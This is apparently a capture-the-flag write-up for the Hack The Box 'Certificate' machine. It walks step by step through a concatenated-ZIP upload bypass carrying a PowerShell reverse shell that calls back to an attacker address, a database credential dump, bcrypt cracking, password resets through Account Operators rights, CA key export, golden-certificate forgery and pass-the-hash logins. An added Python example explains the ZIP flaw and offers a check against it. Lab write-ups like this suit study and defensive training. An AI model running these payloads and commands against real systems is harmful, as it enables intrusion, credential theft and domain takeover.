
Certificate HTB Writeup


First, add the box to /etc/hosts, then browse to http://certificate.htb, register an account and log in.

echo '10.10.11.71 certificate.htb DC01.certificate.htb' | sudo tee -a /etc/hosts

Running gobuster against the site (with the php extension enabled) turns up a PHP file called upload.php.

gobuster dir -u "http://certificate.htb" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x php

![[Pasted image 20250601121121.png]]

Browsing to that page, the site says this:

![[Pasted image 20250601121203.png]]

The page needs a valid s_id, so I fuzzed that parameter in Burp Suite (wfuzz works just as well) until I found one: http://certificate.htb/upload.php?s_id=FUZZ

In this case I used http://certificate.htb/upload.php?s_id=36

Here we have a file upload function. ![[Pasted image 20250601121334.png]]

To get a reverse shell I crafted a malicious .zip. The trick is to concatenate a harmless archive with one containing the PHP shell: the upload check only sees legit.pdf, but the shell from the appended archive still ends up on disk.

echo "I love Astro" > legit.pdf
zip benign.zip legit.pdf

mkdir malicious_files
cd malicious_files
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOURIP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
cd ..
zip -r malicious.zip malicious_files/
cat benign.zip malicious.zip > combined.zip

Now upload combined.zip.

![[Pasted image 20250601122009.png]]

The upload returns a link to the extracted file; in my case it was http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/legit.pdf

To trigger the PHP, change the URL so it points at the shell from the appended archive, which sits under its own directory: http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/malicious_files/shell.php
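Why the concatenated archive works is easier to see in code. The following is an added example, not code from the original writeup: it builds the same benign and malicious archives in memory (the file contents are constructed here, the names are the writeup's), concatenates them, and compares what two different parsers report. A real extractor locates entries through the End Of Central Directory record at the end of the file, so after concatenation the last archive wins; a naive validator that walks local file headers from the front stops at the first archive's central directory and never sees shell.php. The last function is the check an upload handler should make: a clean archive has no bytes before the archive its EOCD describes.

```python
#!/usr/bin/env python3
"""Added example (not from the original writeup): reproduce
`cat benign.zip malicious.zip > combined.zip` in memory and show why two
ZIP parsers disagree about its contents. File contents are constructed."""
import io
import struct
import zipfile

LOCAL_HEADER_SIG = b"PK\x03\x04"
EOCD_SIG = b"PK\x05\x06"


def build_zip(entries):
    """Return the bytes of a ZIP archive holding {name: data}, stored uncompressed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_benign():
    """The decoy archive from the writeup (content constructed)."""
    return build_zip({"legit.pdf": b"I love Astro\n"})


def build_combined():
    """Equivalent of `cat benign.zip malicious.zip > combined.zip`."""
    malicious = build_zip({"malicious_files/shell.php": b"<?php /* payload */ ?>\n"})
    return build_benign() + malicious


def names_via_eocd(data):
    """What a real extractor sees: entries listed by the *last* central directory.
    zipfile finds the EOCD by scanning backwards, then compensates for the
    leading bytes, exactly like most extraction libraries do."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def names_via_local_headers(data):
    """What a naive front-to-back validator sees. It walks local file headers and
    stops at the first record that is not one, i.e. the first archive's central
    directory, so it never reaches the appended archive."""
    names, pos = [], 0
    while data[pos:pos + 4] == LOCAL_HEADER_SIG:
        # Local file header: flags @6, compressed size @18, name len @26, extra len @28.
        flags, comp_size, name_len, extra_len = struct.unpack_from("<H10xI4xHH", data, pos + 6)
        names.append(data[pos + 30:pos + 30 + name_len].decode())
        if flags & 0x0008:
            break  # sizes live in a trailing data descriptor; cannot skip the data safely
        pos += 30 + name_len + extra_len + comp_size
    return names


def leading_prefix_length(data):
    """Defensive check: number of bytes preceding the archive that the last EOCD
    describes. The EOCD stores the central directory offset relative to the
    archive start, so for a clean file cd_offset + cd_size equals the EOCD
    position (result 0); for a concatenated file the difference is the length
    of everything prepended, here the whole benign archive."""
    eocd = data.rfind(EOCD_SIG)
    cd_size, cd_offset = struct.unpack_from("<II", data, eocd + 12)
    return eocd - (cd_offset + cd_size)


if __name__ == "__main__":
    combined = build_combined()
    print("extractor sees  :", names_via_eocd(combined))
    print("naive check sees:", names_via_local_headers(combined))
    print("prefix bytes    :", leading_prefix_length(combined))
```

An upload handler that only lists the archive front-to-back, or only checks the first entry's extension, approves combined.zip, while the extractor it hands the file to unpacks malicious_files/shell.php. Rejecting any archive whose prefix length is non-zero (or, equivalently, listing entries with the same library that later extracts them) closes the gap.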

Before browsing to it, start a listener with nc -nlvp 4444 ![[Pasted image 20250601122530.png]] We get a shell as xamppuser. From there, go a few directories up and read db.php, which holds the database credentials. ![[Pasted image 20250601122613.png]]

With those credentials I crafted this command to dump the users table:

C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D Certificate_WEBAPP_DB -e "SELECT * FROM users;"

This is the result. ![[Pasted image 20250601122845.png]] The one we need is Sara.B's hash; save it to hash.txt. ![[Pasted image 20250601123020.png]]

Then crack it with hashcat (-m 3200 is the bcrypt mode). I used this command:

hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt -O

![[Pasted image 20250601123111.png]]

The hash cracks: Sara.B's password is Blink182.

With a domain user in hand, I first ran BloodHound to map the AD.

bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71

In BloodHound, search for Sara.B and scroll down to Transitive Object Control. ![[Pasted image 20250601123328.png]] The graph shows that Sara.B is a member of Account Operators. ![[Pasted image 20250601123427.png]] Open the Account Operators group and look at Reachable High Value Targets. ![[Pasted image 20250601124011.png]]

This graph shows that the group has GenericAll over LION.SK. ![[Pasted image 20250601124042.png]]

To abuse that, reset Lion.SK's password with net rpc (Account Operators can reset the password of any user that is not in a protected group):

net rpc password "lion.sk" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb

Now we can log in via WinRM with those credentials. The user flag is in C:\Users\Lion.SK\Desktop\user.txt ![[Pasted image 20250601124259.png]]

For root, first reset Ryan.K's password the same way and log in via WinRM.

This is the command I used:

net rpc password "Ryan.K" "newP@ssword2022" -U "certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb

In the WinRM session, whoami /priv shows this: ![[Pasted image 20250601124550.png]]

Ryan.K holds SeManageVolumePrivilege. To abuse it we can upload the SeManageVolumeExploit .exe.

Download the .exe and upload it.

![[Pasted image 20250601124722.png]]

Executing it gives the following output. ![[Pasted image 20250601124745.png]]

After running the exploit Ryan.K has Full Control over C:\, which is enough to read the CA's private key material from the machine store.

Next, export the CA certificate together with its private key from the machine's personal store:

certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
![[Pasted image 20250601124925.png]]

Download ca.pfx to the attacking machine. ![[Pasted image 20250601125020.png]]

With the CA's key we can forge a certificate for Administrator (a golden certificate).

So I ran this command:

certipy forge -ca-pfx ca.pfx \
-upn 'administrator@certificate.htb' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx

![[Pasted image 20250601125127.png]]

The final step is to authenticate with the forged certificate via certipy auth, which returns the Administrator NT hash.

certipy auth -pfx forged_admin.pfx \
-dc-ip 10.10.11.71 \
-username 'administrator' \
-domain 'certificate.htb'

![[Pasted image 20250601125429.png]]

Now we can log in via evil-winrm or psexec; I show both in case one fails.

evil-winrm -i 10.10.11.71 -u administrator -H 'd803303515bf814ac14c5f1702abh866'

impacket-psexec 'Administrator@10.10.11.71' -hashes 'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'

I changed the hashes :) so that everyone actually has to do this machine.

Made by Astro